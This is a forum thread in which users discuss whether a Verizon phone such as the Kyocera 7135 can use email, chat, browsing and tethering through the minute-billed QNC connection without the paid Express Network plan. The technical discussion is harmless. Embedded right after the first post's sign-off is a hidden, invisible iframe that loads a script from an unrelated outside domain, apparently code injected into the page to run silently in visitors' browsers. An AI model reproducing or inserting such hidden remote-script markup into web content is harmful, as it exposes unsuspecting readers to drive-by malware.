+ Reply to Thread

What if I don't get Express Network for Verizon?

At 99.99 on top of cell bill, the price can get mighty pricey might quick.

My question is this: If I do not get Express Network, can I still do data-ish kinda things? Things such as VeriChat, SnapperMail, Blazer/Xiino/EIS, or even having the phone act like a modem? Can this still be done? From what I have been reading from other threads, the answer sounds like no. I was under the impression that I could, but only slower and eating my minutes, vs. using the 1x side of the house.

Someone please explain...

Thanks,

John<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Re: What if I don't get Express Network for Verizon?

Originally posted by zucchero
    My question is this: If I do not get Express Network, can I still do data-ish kinda things? Things such as VeriChat, SnapperMail, Blazer/Xiino/EIS, or even having the phone act like a modem? Can this still be done? From what I have been reading from other threads, the answer sounds like no. I was under the impression that I could, but only slower and eating my minutes, vs. using the 1x side of the house.
    Yes, you can do all of those things without paying anything "extra" for data by using QNC (where it comes from your minutes). I don't know if this can be done with ALL Verizon plans, but I have an America's Choice plan and use QNC for data... no Express network.

The following is a link to a great FAQ for configuring the QNC data connection .
    Please visit my picture site: Robert-O-Rama :)

Re: Re: What if I don't get Express Network for Verizon?

Originally posted by Robert K.
    Yes, you can do all of those things without paying anything "extra" for data by using QNC

Robert, is QNC a lot slower than express network?

Re: Re: What if I don't get Express Network for Verizon?

Originally posted by Robert K.
    Yes, you can do all of those things without paying anything "extra" for data by using QNC (where it comes from your minutes). I don't know if this can be done with ALL Verizon plans, but I have an America's Choice plan and use QNC for data... no Express network.

The following is a link to a great FAQ for configuring the QNC data connection .
    WOW! Now that is what I call a GREAT ANSWER. This would have taken a month with Verizon Tech Support!

THANK YOU!

John

Re: Re: Re: What if I don't get Express Network for Verizon?

Originally posted by liltiki
    I personally have not yet used Express Network, but from what I have read here from those who have it isn't that noticably faster. I did use Sprint's Vision (comparable to EN) for 4 months with my Treo, and I don't really notice much of a speed difference between that and QNC. QNC is fast enough for everything I do (browsing, e-mail, verichat, etc.).
    Please visit my picture site: Robert-O-Rama :)

Re: Re: Re: Re: What if I don't get Express Network for Verizon?

[i]QNC is fast enough for everything I do (browsing, e-mail, verichat, etc.). [/B]

Is it free? And do you have to have Verizon web to use qnc?

I have the cheapest America's Choice plan and I use the QNC connection using the standard programs that came on the phone like EIS Web and Mobile Mail. The speed limit is 14,400bps and while it's not as fast as my cable modem, it's fine for what I need it for, which is checking for e-mail when I'm away from the computer.

Usage counts against your minutes but since I mostly use it on the weekends and I have unlimited nights and weekend minutes, it's as free as it gets.

You don't need any special thing on your Verizon account to use it. Just follow the FAQ for setting it up if it isn't when you get your phone.

Verizon offers a couple "web plans" including "Mobile Web" which is basically hooked into MSN and "Express Network" which lets you get into the high speed access system.
    Taylor Made Web Sites and Domain Services
    Happy Kyocera 7135 User 2003-2008. Now Treo 800w.

Re: Re: Re: What if I don't get Express Network for Verizon?

Originally posted by liltiki
    I have used both QNC and EN. I really notice the EN speed when I use the 7135 as a modem for my notebook. It works great and sure beats trying to connect through hotel phones or even hotel ethernet lines. Otherwise, the speed difference is not that noticeable. E-mail downloads faster with EN, but not fast enough that I would spend extra for it. As far as I can tell, it makes some difference with Web browsing on the 7135, but browsing is still slow.

I use the National Single Rate plan and EN comes off of my minutes. For casual use of the browser and regular e-mail downloads, QNC should be fine.

The 7135 uses a 33MHz processor. At this speed, the difference between EN and QNC is almost nothing. If you're going to use your 7135 as a modem for your computer, that's another thing. But on the 7135 itself, just stick with the QNC and you'll be fine.